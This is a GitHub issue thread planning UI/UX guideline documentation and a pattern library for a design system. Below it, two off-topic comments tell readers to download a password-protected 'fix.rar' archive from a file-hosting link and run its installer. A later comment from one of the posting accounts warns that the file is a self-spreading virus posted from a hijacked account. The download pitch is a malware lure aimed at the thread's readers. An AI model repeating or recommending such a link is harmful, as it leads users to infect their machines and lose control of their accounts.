### ISSUE TITLE
[EPIC](design): UI/UX guidelines and pattern library (1)

### ISSUE THREAD

**Issue by edda** [cloudoperators/juno#277]
### Description

Start working towards an end user documentation as described above. Begin collecting content, make fundamental decisions regarding structure and depth. Focus on content, structure and narratives. Further identify potential next topics and gaps that need to be filled towards Milestone Dec 20. Gain confidence as a team and establish a common understanding regarding the nature of this documentation, make sure all team members are on board and included.

#### Scope
* onboard new colleague and get them productive
* Identify first batch of relevant topics
* collect content for first batch of topics
* draft documentation taxonomy and overall narrative
* define general structure for individual top-level topics
* implement general structure for the first batch of topics (depending on the number of topics in first batch, minimum is 1 topic)
* identify topics for next epic

#### Not in Scope
* technical discussions about the documentation, this epic is exclusively about content structure and narrative
* detailed discussions of individual topics that are not necessary to achieve scope

#### Deliverables
- [x] share created documentation content and structure as described in scope in a single location (Figma/Mural) that can easily accessed by anybody in the team.

### Objectives

- Provide a place for users to look up UI/UX documentation, guidelines and examples
- Explain context that goes above the storybook documentation that we have on an atomic (component) level
- Provide sensible recommendations for more complex composable patterns
- Provide decision trees or similar as a starting point for people to be able to make decisions regarding which components or patterns to use

### Documentation structure

1. **Introduction to the Design System**
- **Overview**: Introduction to the purpose of the design system and its benefits.
- **Getting Started**: Instructions on how to integrate and start using the design system in projects.
- **Quick Start Guide**: A brief tutorial to get users up and running quickly, hello world style

2. **Terminology and Conventions**
- **Key Terms**: Definitions of common terms used throughout the documentation.

### Tasks/First batch of topics

- [ ] Layout
- [ ] Content Area
- [ ] Lists (DataGrid)
- [ ] Panel
- [ ] Forms

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinecraftEarthVillage** [comment]
> 下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
